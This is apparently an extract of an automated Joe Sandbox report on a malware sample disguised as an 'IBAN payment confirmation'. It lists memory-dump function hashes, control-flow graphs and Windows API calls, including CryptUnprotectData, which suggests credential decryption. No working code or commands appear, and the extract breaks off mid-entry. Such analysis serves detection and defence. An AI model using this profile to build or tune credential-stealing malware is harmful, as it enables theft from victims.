                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 834300711-0
                                                                                                                              • Opcode ID: 51cd0d8b24ca848a190403d6e9ede4c830bd6ab0d5bf1ee0e881778ec4d38e7e
                                                                                                                              • Instruction ID: b51f29180cc0755fb3e48092e56039843a7f2337c6bc38ade152018e975e44d4
                                                                                                                              • Opcode Fuzzy Hash: 51cd0d8b24ca848a190403d6e9ede4c830bd6ab0d5bf1ee0e881778ec4d38e7e
                                                                                                                              • Instruction Fuzzy Hash: F02138B68002499FDB10CF99C945BEEBFF4EB48320F148419E555A7210C735A551DFA1
                                                                                                                              APIs
                                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3983BD25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 834300711-0
                                                                                                                              • Opcode ID: f9033752ca45fe2698b54cd14d43e285a433ee805ffedcc90923a4f27b98016c
                                                                                                                              • Instruction ID: 14da8ad537867a39f03b87f9fe3da16e0a29dd8efaf8c2e7cea2787f494ade43
                                                                                                                              • Opcode Fuzzy Hash: f9033752ca45fe2698b54cd14d43e285a433ee805ffedcc90923a4f27b98016c
                                                                                                                              • Instruction Fuzzy Hash: DB1114B68003499FDB20CF99C945BEEBBF4EB48320F148419EA18A7210C739A955DFA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fc36bb134cc0150bc1316e2e2b4a08017735dd3463156d21b3007cc1756ff779
                                                                                                                              • Instruction ID: d4d1074342a4e5f9b6364f230b9c891bcc86e18c0197141d0492367972fed25e
                                                                                                                              • Opcode Fuzzy Hash: fc36bb134cc0150bc1316e2e2b4a08017735dd3463156d21b3007cc1756ff779
                                                                                                                              • Instruction Fuzzy Hash: D8729074E012688FEB64DF69C980BD9BBB2BF49300F5481E9D449A7395DB349E81CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b10d8f169df45c860ce81ccd8f970786ccdee96ff932d05a1aa177d4e192bc24
                                                                                                                              • Instruction ID: b8c024c9e946585abcc2ea8a88733546e9b41d67a213d29c44773feac895a36b
                                                                                                                              • Opcode Fuzzy Hash: b10d8f169df45c860ce81ccd8f970786ccdee96ff932d05a1aa177d4e192bc24
                                                                                                                              • Instruction Fuzzy Hash: AFE19E74E01218CFEB64CFA5C884BDDBBB2BF89300F6081A9D419A7395DB759A85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2503655463.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_110000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 291f19ce7d085b8dbf9dc123f1d8921e1ff8a26d00ef7687fe8cad1b8a08c7e1
                                                                                                                              • Instruction ID: 97774f54cdcba79bc62aa8420a5fdcc69af19dff012781e1df8250cf6d24d37e
                                                                                                                              • Opcode Fuzzy Hash: 291f19ce7d085b8dbf9dc123f1d8921e1ff8a26d00ef7687fe8cad1b8a08c7e1
                                                                                                                              • Instruction Fuzzy Hash: A1C1B274E01218CFEB14DFA5C954B9DBBB2BF88301F2081AAD809A7355DB359E85DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8f5861200db8d0b2b695fb460c0cfaf3816a58192372480d7bb2debf33ec9dc3
                                                                                                                              • Instruction ID: 09b3e9fdfd03fd3304948fafe609a13ac0a6e90d18d2b686f60be904fca80112
                                                                                                                              • Opcode Fuzzy Hash: 8f5861200db8d0b2b695fb460c0cfaf3816a58192372480d7bb2debf33ec9dc3
                                                                                                                              • Instruction Fuzzy Hash: 4BC1C178E01218CFEB14DFA5C884B9DBBB2BF89300F5081A9D809AB355DB349E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2503655463.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_110000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 47784a11d41b640a9387742cfefbe9eaa3f9790c2edb9b5a8a34646fd0158dc3
                                                                                                                              • Instruction ID: 69dc007c8aa43b1c968df39ebb3318d607a4711d055db0a14c5f88424fe19933
                                                                                                                              • Opcode Fuzzy Hash: 47784a11d41b640a9387742cfefbe9eaa3f9790c2edb9b5a8a34646fd0158dc3
                                                                                                                              • Instruction Fuzzy Hash: DEA11670D00208CFEB14DFA8C944BDDBBB2FF89314F248269E409AB291DB759985CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 081d9dbf00ca2e31cdb7b72dfc1341c9ee97a621667ac3e44b9d5ddeb710ddd0
                                                                                                                              • Instruction ID: 69b0bd5a3fe13d96191e2ac2f750e56589c08cc17b4f4d77fddc11a8d54747fa
                                                                                                                              • Opcode Fuzzy Hash: 081d9dbf00ca2e31cdb7b72dfc1341c9ee97a621667ac3e44b9d5ddeb710ddd0
                                                                                                                              • Instruction Fuzzy Hash: D3A17FB5E012288FEB18CF6AD944BDDBBF2AF89300F14D1AAD408A7255DB345A85CF51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e4e5bdf7f17bbe05b39853d4b1d016394c27ce12a6530c800c8c4d8072831734
                                                                                                                              • Instruction ID: a1ccf83c8d405e07bd31dac5ce20bad05f98672d9f51a253920a2ea0a6059a4e
                                                                                                                              • Opcode Fuzzy Hash: e4e5bdf7f17bbe05b39853d4b1d016394c27ce12a6530c800c8c4d8072831734
                                                                                                                              • Instruction Fuzzy Hash: CAA19FB4E012288FEB18CF6AD944BDDBBF2BF89300F54C1AAD408A7255DB345A85CF51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee12da3fe77c95f538cd0cf965d073ceea0de027b0ca28474a3e299aab79137d
                                                                                                                              • Instruction ID: 64eaa7d09619f3eef3764a2b08ea00210cbc30073c7c6ab3a4f5511326928f3f
                                                                                                                              • Opcode Fuzzy Hash: ee12da3fe77c95f538cd0cf965d073ceea0de027b0ca28474a3e299aab79137d
                                                                                                                              • Instruction Fuzzy Hash: 5FA181B5E012288FEB58CF6AD944BDDBBF2BF89300F14C1AAD408A7255DB345A85CF51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4b56f5204803e83d2e9323e6ff763a01f72029e07e39e7a92f185a4d1bcbbda
                                                                                                                              • Instruction ID: effeb1674236ecc4581ee763ea8c2eb73be5263814487e0620006429653b76a3
                                                                                                                              • Opcode Fuzzy Hash: a4b56f5204803e83d2e9323e6ff763a01f72029e07e39e7a92f185a4d1bcbbda
                                                                                                                              • Instruction Fuzzy Hash: 84A18FB4E012288FEB14CF6AD944BDEBBF2BF89300F14C1AAD408A7255DB345A85CF51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2503655463.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_110000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 116cd661a9aeeb9d94b5c23eb621cb5e0a803e6cf6c4a1dd3925a364c8a403e8
                                                                                                                              • Instruction ID: 0b68631e0aa402bf3f28e37c6dff5f55a242658b338a570ffb094403046e92eb
                                                                                                                              • Opcode Fuzzy Hash: 116cd661a9aeeb9d94b5c23eb621cb5e0a803e6cf6c4a1dd3925a364c8a403e8
                                                                                                                              • Instruction Fuzzy Hash: 6591E174D00208CFEB14DFA8C988BDCBBF2BF49314F208269E549AB291DB759985CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1a438eaa9d36d980d706506b48b72fce9461d076e1fe968aba94283bba8cad88
                                                                                                                              • Instruction ID: dfd8cf6a84a7706cfe543b3b81250f0d69b0251dfa4d2b9ca41914e3cc777240
                                                                                                                              • Opcode Fuzzy Hash: 1a438eaa9d36d980d706506b48b72fce9461d076e1fe968aba94283bba8cad88
                                                                                                                              • Instruction Fuzzy Hash: 5181D174E002488FEB14DFAAD9906DDFBF2BF88310F248129D414AB395DB359D42CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1490ee9fd46cf961182a20373f61c9fb63c6d3329f11be151dcc8e5949d398bf
                                                                                                                              • Instruction ID: 671dfcade24f43564390ce58bd4bcc49181753d2b5c9d17002236040ef82cf68
                                                                                                                              • Opcode Fuzzy Hash: 1490ee9fd46cf961182a20373f61c9fb63c6d3329f11be151dcc8e5949d398bf
                                                                                                                              • Instruction Fuzzy Hash: 6371C475D01628CFDB68DF66C9807DDBBB2BF89300F1091AAD408A7364DB349A86CF40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ca641970a71da59fe639829468463ee8e9dc2d9f4536dd0863f9918ca63ec429
                                                                                                                              • Instruction ID: 96f56210345194eacc0924ff70e519ed255526c685b5bbc81b6f393b26b89b28
                                                                                                                              • Opcode Fuzzy Hash: ca641970a71da59fe639829468463ee8e9dc2d9f4536dd0863f9918ca63ec429
                                                                                                                              • Instruction Fuzzy Hash: D07184B4E006188FEB58CF6AD94479EBAF2BF89300F14C1AAD40DB7255DB345A85CF51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e08264605b4f5feb75fa9191a004f1dad574503d58a15c8fcf5d0bc2cd985b10
                                                                                                                              • Instruction ID: c209bf780a3344e0985d09221f7cbd6cbeb6baa5096ca9d0a51dfedefc787cf5
                                                                                                                              • Opcode Fuzzy Hash: e08264605b4f5feb75fa9191a004f1dad574503d58a15c8fcf5d0bc2cd985b10
                                                                                                                              • Instruction Fuzzy Hash: 9161FB74A40219DFEB25DF70C855BADBB72FF88301F1080A9990A67791DB356E82EF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f7d0b218124451749b58932aba49f7b10b7db4efaa21f20589b4b78361907e92
                                                                                                                              • Instruction ID: 24175b82aeee8f8b2a35d6a7fc56ff429756a628e4eb57c89f6c9eb4adbd5da0
                                                                                                                              • Opcode Fuzzy Hash: f7d0b218124451749b58932aba49f7b10b7db4efaa21f20589b4b78361907e92
                                                                                                                              • Instruction Fuzzy Hash: 394149B1E016188BEB58CF6BCD457CAFAF3AFC9300F14C1AAC50CA6264DB744A858F55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ea484ac1287defdaf75023e3173457a288937f043c8611aeaaacbe9e9477a766
                                                                                                                              • Instruction ID: e9132a9b6a92f123caed56baae64f3deca40b0a2bb1a5fe7de53a629f44ba7b3
                                                                                                                              • Opcode Fuzzy Hash: ea484ac1287defdaf75023e3173457a288937f043c8611aeaaacbe9e9477a766
                                                                                                                              • Instruction Fuzzy Hash: 494148B1E016188BEB58CF6BD9457C9FAF3BFC9300F14C1AAC50CA6264DB744A858F51

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 775 3a2005f8-3a200697 GetCurrentProcess 779 3a2006a0-3a2006d4 GetCurrentThread 775->779 780 3a200699-3a20069f 775->780 781 3a2006d6-3a2006dc 779->781 782 3a2006dd-3a200711 GetCurrentProcess 779->782 780->779 781->782 784 3a200713-3a200719 782->784 785 3a20071a-3a200732 782->785 784->785 796 3a200735 call 3a200fc1 785->796 797 3a200735 call 3a200be1 785->797 787 3a20073b-3a20076a GetCurrentThreadId 789 3a200773-3a2007d5 787->789 790 3a20076c-3a200772 787->790 790->789 796->787 797->787
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 3A200686
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 3A2006C3
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 3A200700
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 3A200759
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: cf68b17899f511988c66c00a3fa01c749db8fbf634d3dc82aae61a896ead61ea
                                                                                                                              • Instruction ID: cb9bf5bf757f5aba718177e8f8d1e1552b981c7e4fde6b2fac50d90c1f402bf2
                                                                                                                              • Opcode Fuzzy Hash: cf68b17899f511988c66c00a3fa01c749db8fbf634d3dc82aae61a896ead61ea
                                                                                                                              • Instruction Fuzzy Hash: F25169B490434A8FEB14DFA9D544BEEBBF1EF88314F208469D019A73A0D7346945CF66

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 798 3a200608-3a200697 GetCurrentProcess 802 3a2006a0-3a2006d4 GetCurrentThread 798->802 803 3a200699-3a20069f 798->803 804 3a2006d6-3a2006dc 802->804 805 3a2006dd-3a200711 GetCurrentProcess 802->805 803->802 804->805 807 3a200713-3a200719 805->807 808 3a20071a-3a200732 805->808 807->808 819 3a200735 call 3a200fc1 808->819 820 3a200735 call 3a200be1 808->820 810 3a20073b-3a20076a GetCurrentThreadId 812 3a200773-3a2007d5 810->812 813 3a20076c-3a200772 810->813 813->812 819->810 820->810
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 3A200686
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 3A2006C3
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 3A200700
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 3A200759
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 622945ba384fbe07e07ec664ddf0fbac949054ae2912174975818fea3b006346
                                                                                                                              • Instruction ID: 3ede39db47580ab049d223eb5c931db36bfddb5f056ee930149e9c836fff31d5
                                                                                                                              • Opcode Fuzzy Hash: 622945ba384fbe07e07ec664ddf0fbac949054ae2912174975818fea3b006346
                                                                                                                              • Instruction Fuzzy Hash: A55169B49043498FEB14DFAAD544B9EBBF1EF88314F208419E019A7360DB346945CF65
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q
                                                                                                                              • API String ID: 0-1467158625
                                                                                                                              • Opcode ID: 977f5eff5d351ecc256c4cb67a8d966840707a8b2b6800da9b8594b6756dadc1
                                                                                                                              • Instruction ID: 0117159b8ea7d2b656e56408a714e15978333a079bf48d5bb4ea171b615f18ed
                                                                                                                              • Opcode Fuzzy Hash: 977f5eff5d351ecc256c4cb67a8d966840707a8b2b6800da9b8594b6756dadc1
                                                                                                                              • Instruction Fuzzy Hash: F2515D70A002099FDB05EFA8D555AEEBBB2FF89300F104169E005BB266DB35AD46CF91
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0011FEAA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2503655463.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_110000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 8af7a1b7ceb684a2d11f9e40c962e5a9479a738b0160a7deede125d71c798227
                                                                                                                              • Instruction ID: c383c17015c94deea90071650f3b03c729bcf644ce8197754e33f60e73301d83
                                                                                                                              • Opcode Fuzzy Hash: 8af7a1b7ceb684a2d11f9e40c962e5a9479a738b0160a7deede125d71c798227
                                                                                                                              • Instruction Fuzzy Hash: 1551B1B1D10319DFDB14CF99C984ADEBBB1BF48310F25812EE819AB251D7759885CF90
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0011FEAA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2503655463.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_110000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: e359c430329ab480a8312d78541bd02ac5399121e79baaf7d32404cb6cedae98
                                                                                                                              • Instruction ID: 918a6c65eec37bdcfb3d38eb61932bee33fe5f7a7f60a45b16651fe35339fa84
                                                                                                                              • Opcode Fuzzy Hash: e359c430329ab480a8312d78541bd02ac5399121e79baaf7d32404cb6cedae98
                                                                                                                              • Instruction Fuzzy Hash: 2441C0B1D00309DFDB14CF9AC984ADEBBB5BF48310F25812EE819AB250D7759886CF90
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 3A201B11
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 1976a4cf5243c7722440f2fb18ff330f7fab9c0bb12c08c4203a8c5c07046ee3
                                                                                                                              • Instruction ID: 6345df9f5227a3cb5f6722087aa6e90058ea79141e672c847dc359320bd6b9ed
                                                                                                                              • Opcode Fuzzy Hash: 1976a4cf5243c7722440f2fb18ff330f7fab9c0bb12c08c4203a8c5c07046ee3
                                                                                                                              • Instruction Fuzzy Hash: 9C4106B9A003459FDB14CF95C484BAABBF6FF88314F25C459E519AB321D774A842CFA0
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A200CDF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 7cf87145b617f7846ca83838dd0bf081e9c02b21104eb1185eb184e513311b7d
                                                                                                                              • Instruction ID: 432b5e77d37087af51eeaf4b25d4cfbb5b9795f49060423bbeab0bbac5b7c28f
                                                                                                                              • Opcode Fuzzy Hash: 7cf87145b617f7846ca83838dd0bf081e9c02b21104eb1185eb184e513311b7d
                                                                                                                              • Instruction Fuzzy Hash: F62103B5D00249DFDB10CFA9D580AEEBBF4FB48320F14842AE915A3310C378A941CF60
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A200CDF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: aab71200acc63097d0e55938cccced1d72a839e50b977de54ed7ecc59ebc7c30
                                                                                                                              • Instruction ID: e76f77558dbd912198652388d3a2b850bff68b97fabe2599277cbb8a1dbb460f
                                                                                                                              • Opcode Fuzzy Hash: aab71200acc63097d0e55938cccced1d72a839e50b977de54ed7ecc59ebc7c30
                                                                                                                              • Instruction Fuzzy Hash: 2721E4B5D002499FDB10CFAAD984ADEBBF4FB48320F14801AE915A3310D778A940CF61
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Timer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2870079774-0
                                                                                                                              • Opcode ID: 329613c1c0818c237317c1e1ad960c2023df5c4a8c191385c8ce6bbc2716b1ce
                                                                                                                              • Instruction ID: 543c61f991c74bbadd22dde3624eafffabbf354ab8e9504c2d1aa0176a965c24
                                                                                                                              • Opcode Fuzzy Hash: 329613c1c0818c237317c1e1ad960c2023df5c4a8c191385c8ce6bbc2716b1ce
                                                                                                                              • Instruction Fuzzy Hash: EB11F2B68003499FDB20DF9AD585BDEBBF4FB48320F10841AE558A7210C379A984CFA1
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 3A20D395
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: 224cdd97cf28ffd94b666c31ab818d0d25d3e7b44095e36340632555fb51a961
                                                                                                                              • Instruction ID: 0c707c11dcbf6152360d0b23c7ade64cf80cd3c3966c2180020641a11a2c976e
                                                                                                                              • Opcode Fuzzy Hash: 224cdd97cf28ffd94b666c31ab818d0d25d3e7b44095e36340632555fb51a961
                                                                                                                              • Instruction Fuzzy Hash: 581142B5D003488FCB20DF9AC944B9EFBF4EB48324F20845AE918A3300C778A940CFA5
                                                                                                                              APIs
                                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3A20D87F), ref: 3A20E6AD
                                                                                                                              Memory Dump Source
